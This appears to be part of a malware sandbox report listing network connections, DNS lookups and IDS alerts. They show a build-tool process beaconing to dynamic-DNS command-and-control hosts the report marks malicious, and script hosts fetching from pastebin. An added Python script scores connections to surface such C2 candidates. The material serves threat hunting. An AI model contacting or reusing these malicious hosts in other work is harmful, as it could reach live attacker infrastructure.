2104 MSBuild.exe 197.210.226.159:10123 MTN NIGERIA Communication limited NG unknown
–– –– 8.8.8.8:53 Google Inc. US whitelisted
2104 MSBuild.exe 185.56.90.78:10123 Buzinessware FZCO AE unknown
2104 MSBuild.exe 8.8.4.4:53 Google Inc. US whitelisted

DNS requests

Domain IP Reputation
asdadwnixwed.blogspot.com 172.217.23.129 whitelisted
www.blogger.com 172.217.21.233 whitelisted
apis.google.com 172.217.21.206 whitelisted
pagead2.googlesyndication.com 172.217.16.162 whitelisted
resources.blogblog.com 216.58.210.9 unknown
accounts.google.com 172.217.16.173 shared
www.gstatic.com 172.217.18.99 whitelisted
www.pastebin.com 104.20.208.21, 104.20.209.21 shared
pastebin.com 104.20.209.21, 104.20.208.21 shared
officewk.duckdns.org 197.210.226.159 malicious
officewk2020.hopto.org 185.56.90.78 malicious

Threats

PID Process Class Message
2632 mshta.exe Misc activity SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7)
2104 MSBuild.exe Misc activity ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
2104 MSBuild.exe Misc activity ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
2104 MSBuild.exe Misc activity ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
2104 MSBuild.exe Misc activity ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
2104 MSBuild.exe Misc activity ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
2104 MSBuild.exe Misc activity ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
2104 MSBuild.exe Misc activity ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
2104 MSBuild.exe Misc activity ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
2104 MSBuild.exe Misc activity ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
2104 MSBuild.exe Misc activity ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
2104 MSBuild.exe Misc activity ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
2104 MSBuild.exe Misc activity ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
2104 MSBuild.exe Misc activity ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
2104 MSBuild.exe Misc activity ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
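Read together, the Connections, DNS requests and Threats tables show MSBuild.exe (PID 2104) connecting to 197.210.226.159:10123 and 185.56.90.78:10123, both resolved from dynamic-DNS hostnames the report marks malicious (officewk.duckdns.org, officewk2020.hopto.org), while mshta.exe and powershell.exe fetch from pastebin over ports 80 and 443. Note that the IDS only alerted on the *.duckdns query; the hopto.org lookup produced no rule hit, so a hunter relying on the Threats table alone would miss the second C2 endpoint. The Python below is an added example, not part of the report: it joins each connection to the DNS table and scores it on process, port and resolved hostname. The suffix lists, the expected-process set and the two-reason threshold are assumptions to tune per environment.

```python
"""Score sandbox connection rows against the DNS table to surface C2
candidates. Added example, not part of the ANY.RUN report. The sample rows
are constructed from the tables above; suffix lists, the expected-process
set and the reason threshold are assumptions, not report data."""
import ipaddress
from dataclasses import dataclass

DYNDNS_SUFFIXES = ("duckdns.org", "hopto.org", "no-ip.org", "no-ip.biz",
                   "ddns.net", "zapto.org", "myftp.org", "sytes.net")
PASTE_SUFFIXES = ("pastebin.com", "paste.ee", "hastebin.com")
# Processes expected to talk to the network on a workstation (assumption;
# tune per environment). Script hosts and build tools are deliberately absent.
EXPECTED_NET_PROCS = {"chrome.exe", "iexplore.exe", "firefox.exe",
                      "outlook.exe", "svchost.exe"}
COMMON_PORTS = {53, 80, 443}

SAMPLE_DNS = [  # constructed from the DNS requests table: (domain, [ips])
    ("asdadwnixwed.blogspot.com", ["172.217.23.129"]),
    ("www.pastebin.com", ["104.20.208.21", "104.20.209.21"]),
    ("pastebin.com", ["104.20.209.21", "104.20.208.21"]),
    ("officewk.duckdns.org", ["197.210.226.159"]),
    ("officewk2020.hopto.org", ["185.56.90.78"]),
]
SAMPLE_CONNECTIONS = [  # constructed from the Connections table: (pid, process, ip:port)
    ("3952", "mshta.exe", "172.217.23.129:443"),
    ("2632", "mshta.exe", "104.20.208.21:80"),
    ("3720", "powershell.exe", "104.20.209.21:443"),
    ("2104", "MSBuild.exe", "8.8.8.8:53"),
    ("2104", "MSBuild.exe", "197.210.226.159:10123"),
    ("2104", "MSBuild.exe", "185.56.90.78:10123"),
    ("2104", "MSBuild.exe", "8.8.4.4:53"),
]


@dataclass
class Indicator:
    pid: str
    process: str
    ip: str
    port: int
    domains: tuple   # hostnames that resolved to this IP during the run
    reasons: tuple   # why the connection is interesting


def has_suffix(domain, suffixes):
    d = domain.lower().rstrip(".")
    return any(d == s or d.endswith("." + s) for s in suffixes)


def ip_index(dns_rows):
    """Invert the DNS table so a connection's IP can be joined back to names."""
    index = {}
    for domain, ips in dns_rows:
        for ip in ips:
            index.setdefault(ip, set()).add(domain.lower())
    return index


def score_connections(connections, dns_rows):
    index = ip_index(dns_rows)
    out = []
    for pid, proc, endpoint in connections:
        ip, _, port = endpoint.rpartition(":")
        port = int(port)
        if not ipaddress.ip_address(ip).is_global:
            continue  # sandbox-internal or private address; not a C2 candidate here
        domains = tuple(sorted(index.get(ip, ())))
        reasons = []
        if any(has_suffix(d, DYNDNS_SUFFIXES) for d in domains):
            reasons.append("dynamic_dns")
        if any(has_suffix(d, PASTE_SUFFIXES) for d in domains):
            reasons.append("paste_site")
        if port not in COMMON_PORTS:
            reasons.append("uncommon_port")
        if proc.lower() not in EXPECTED_NET_PROCS:
            reasons.append("unexpected_process")
        out.append(Indicator(pid, proc, ip, port, domains, tuple(reasons)))
    return out


def c2_candidates(connections, dns_rows, min_reasons=2):
    """Keep connections with at least min_reasons independent signals."""
    return [i for i in score_connections(connections, dns_rows)
            if len(i.reasons) >= min_reasons]


def hunt_list(indicators):
    """Unique (domain, ip, port) triples to push to a hunt query or blocklist."""
    return sorted({(d, i.ip, i.port) for i in indicators for d in (i.domains or ("",))})


if __name__ == "__main__":
    for ind in c2_candidates(SAMPLE_CONNECTIONS, SAMPLE_DNS):
        print(f"{ind.process:<15} {ind.ip}:{ind.port:<6} {','.join(ind.domains):<40} {ind.reasons}")
    print(hunt_list(c2_candidates(SAMPLE_CONNECTIONS, SAMPLE_DNS)))
```

With the threshold at two reasons, the two port-10123 connections score three (dynamic DNS, uncommon port, build tool as the client) and the pastebin fetches score two (paste site, script host as the client); the Google-hosted blogspot traffic and the DNS lookups to 8.8.8.8 and 8.8.4.4 score one and drop out.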

Debug output strings

No debug info.